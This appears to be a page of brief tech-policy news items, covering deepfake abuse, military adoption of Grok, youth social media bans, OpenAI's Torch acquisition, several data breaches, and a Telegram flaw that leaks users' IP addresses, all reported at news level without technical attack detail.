UK lawmaker Jess Asato said an AI-altered image depicting her in a bikini circulated online. The incident follows wider reports of sexualised deepfake abuse targeting women on social media.
Platforms hosted thousands of comments, including further manipulated images, heightening distress. Victims describe the content as realistic, dehumanising and violating personal consent.
Government ministers of the UK pledged to ban nudification tools and criminalise non-consensual intimate images. Technology firms face pressure to remove content, suspend accounts, and follow Ofcom guidance to maintain a safe online environment.
Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!
The US Department of Defence plans to integrate Elon Musk’s AI tool Grok into Pentagon networks later in January, according to Defence Secretary Pete Hegseth.
The system is expected to operate across both classified and unclassified military environments as part of a broader push to expand AI capabilities.
Hegseth also outlined an AI acceleration strategy designed to increase experimentation, reduce administrative barriers and prioritise investment across defence technology.
An approach that aims to enhance access to data across federated IT systems, aligning with official views that military AI performance relies on data availability and interoperability.
The move follows earlier decisions by the Pentagon to adopt Google’s Gemini for an internal AI platform and to award large contracts to Anthropic, OpenAI, Google and xAI for agentic AI development.
Officials describe these efforts as part of a long-term strategy to strengthen US military competitiveness in AI.
Grok’s integration comes amid ongoing controversy, including criticism over generated imagery and previous incidents involving extremist and offensive content. Several governments and regulators have already taken action against the tool, adding scrutiny to its expanded role within defence systems.
Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!
Keir Starmer has told Labour MPs that he is open to an Australian-style ban on social media for young people, following concerns about the amount of time children spend on screens.
Starmer previously opposed such a ban, arguing that enforcement would prove difficult and might instead push teenagers towards unregulated online spaces rather than safer platforms. Growing political momentum across Westminster, combined with Australia’s decision to act, has led to a reassessment of that position.
Speaking to MPs, Starmer said different enforcement approaches were being examined and added that phone use during school hours should be restricted.
UK ministers have also revisited earlier proposals aimed at reducing the addictive design of social media and strengthening safeguards on devices sold to teenagers.
Support for stricter measures has emerged across party lines, with senior figures from Labour, the Conservatives, the Liberal Democrats and Reform UK signalling openness to a ban.
A final decision is expected within months as ministers weigh child safety, regulation and practical implementation.
Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!
The US AI company, OpenAI, has acquired healthcare technology startup Torch only days after unveiling ChatGPT Health, signalling an accelerated push into medical and clinical applications.
Financial terms were not officially disclosed, although media reports estimate the transaction at between $60 million and $100 million.
Torch was developed as a unified medical memory platform, designed to consolidate patient data from hospitals, laboratories, wearable devices and consumer testing services.
The company positioned its technology as a means to support AI systems in navigating fragmented healthcare information, rather than relying on isolated data sources.
Torch’s four-person team will join OpenAI following the acquisition, reinforcing the company’s internal healthcare expertise. OpenAI has emphasised privacy, safety and collaboration with medical professionals as core principles guiding its expansion into sensitive data environments.
The move follows a broader strategy by OpenAI to strengthen enterprise offerings, particularly for large healthcare organisations. Recent hires and partnerships suggest healthcare remains a priority area as AI adoption increases across regulated sectors.
Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!
A UK public sector cyberattack on Kensington and Chelsea Council has exposed the growing vulnerability of government organisations to data breaches. The council stated that personal details linked to hundreds of thousands of residents may have been compromised after attackers targeted the shared IT infrastructure.
Security experts warn that interconnected systems, while cost-efficient, create systemic risks. Dray Agha, senior manager of security operations at Huntress, said a single breach can quickly spread across partner organisations, disrupting essential services and exposing sensitive information.
Public sector bodies remain attractive targets due to ageing infrastructure and the volume of personal data they hold. Records such as names, addresses, national ID numbers, health information, and login credentials can be exploited for fraud, identity theft, and large-scale scams.
Gregg Hardie, public sector regional vice president at SailPoint, noted that attackers often employ simple, high-volume tactics rather than sophisticated techniques. Compromised credentials allow criminals to blend into regular activity and remain undetected for long periods before launching disruptive attacks.
Hardie said stronger identity security and continuous monitoring are essential to prevent minor intrusions from escalating. Investing in resilient, segmented systems could help reduce the impact of future UK public sector cyberattack incidents and protect critical operations.
Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!
A newly identified vulnerability in Telegram’s mobile apps allows attackers to reveal users’ real IP addresses with a single click. The flaw, known as a ‘one-click IP leak’, can expose location and network details even when VPNs or proxies are enabled.
The issue comes from Telegram’s automatic proxy testing process. When a user clicks a disguised proxy link, the app initiates a direct connection request that bypasses all privacy protections and reveals the device’s real IP address.
Cybersecurity researcher @0x6rss demonstrated an attack on X, showing that a single click is enough to log a victim’s real IP address. The request behaves similarly to known Windows NTLM leaks, where background authentication attempts expose identifying information without explicit user consent.
ONE-CLICK TELEGRAM IP ADDRESS LEAK!
In this issue, the secret key is irrelevant. Just like NTLM hash leaks on Windows, Telegram automatically attempts to test the proxy. Here, the secret key does not matter and the IP address is exposed. Example of a link hidden behind a… https://t.co/KTABAiuGYIpic.twitter.com/NJLOD6aQiJ
Attackers can embed malicious proxy links in chats or channels, masking them as standard usernames. Once clicked, Telegram silently runs the proxy test, bypasses VPN or SOCKS5 protections, and sends the device’s real IP address to the attacker’s server, enabling tracking, surveillance, or doxxing.
Both Android and iOS versions are affected, putting millions of privacy-focused users at risk. Researchers recommend avoiding unknown links, turning off automatic proxy detection where possible, and using firewall tools to block outbound proxy tests. Telegram has not publicly confirmed a fix.
Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!
Fintech investment platform Betterment has confirmed a data breach after hackers gained unauthorised access to parts of its internal systems and exposed personal customer information.
The incident occurred on 9 January and involved a social engineering attack connected to third-party platforms used for marketing and operational purposes.
The company said the compromised data included customer names, email and postal addresses, phone numbers and dates of birth.
No passwords or account login credentials were accessed, according to Betterment, which stressed that customer investment accounts were not breached.
Using the limited system access, attackers sent fraudulent notifications to some users promoting a crypto-related scam.
Customers were advised to ignore the messages instead of engaging with the request, while Betterment moved quickly to revoke the unauthorised access and begin a formal investigation with external cybersecurity support.
Betterment has not disclosed how many users were affected and has yet to provide further technical details. Representatives did not respond to requests for comment at the time of publication, while the company said outreach to impacted customers remains ongoing.
Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!
The eSafety regulator in Australia has expressed concern over the misuse of the generative AI system Grok on social media platform X, following reports involving sexualised or exploitative content, particularly affecting children.
Although overall report numbers remain low, authorities in Australia have observed a recent increase over the past weeks.
The regulator confirmed that enforcement powers under the Online Safety Act remain available where content meets defined legal thresholds.
X and other services are subject to systemic obligations requiring the detection and removal of child sexual exploitation material, alongside broader industry codes and safety standards.
eSafety has formally requested further information from X regarding safeguards designed to prevent misuse of generative AI features and to ensure compliance with existing obligations.
Previous enforcement actions taken in 2025 against similar AI services resulted in their withdrawal from the Australian market.
Additional mandatory safety codes will take effect in March 2026, introducing new obligations for AI services to limit children’s exposure to sexually explicit, violent and self-harm-related material.
Authorities emphasised the importance of Safety by Design measures and continued international cooperation among online safety regulators.
Would you like to learn more aboutAI, tech and digital diplomacy? If so, ask our Diplo chatbot!
A US teenager targeted by explicit deepfake images has helped create a new training course. The programme aims to support students, parents and school staff facing online abuse.
The course explains how AI tools are used to create sexualised fake images. It also outlines legal rights, reporting steps and available victim support resources.
Research shows deepfake abuse is spreading among teenagers, despite stronger laws. One in eight US teens know someone targeted by non-consensual fake images.
Developers say education remains critical as AI tools become easier to access. Schools are encouraged to adopt training to protect students and prevent harm.
Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!
Canopy Healthcare, one of New Zealand’s largest private medical oncology providers, has disclosed a data breach affecting patient and staff information, six months after the incident occurred.
The company said an unauthorised party accessed part of its administration systems on 18 July 2025, copying a ‘small’ amount of data. Affected information may include patient records, passport details, and some bank account numbers.
Canopy said it remains unclear exactly which individuals were impacted and what data was taken, adding that no evidence has emerged of the information being shared or published online.
Patients began receiving notifications in December 2025, prompting criticism over the delay. One affected patient said they were unhappy to learn about the breach months after it happened.
The New Zealand company said it notified police and the Privacy Commissioner at the time, secured a High Court injunction to prevent misuse of the data, and confirmed that its medical services continue to operate normally.
Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!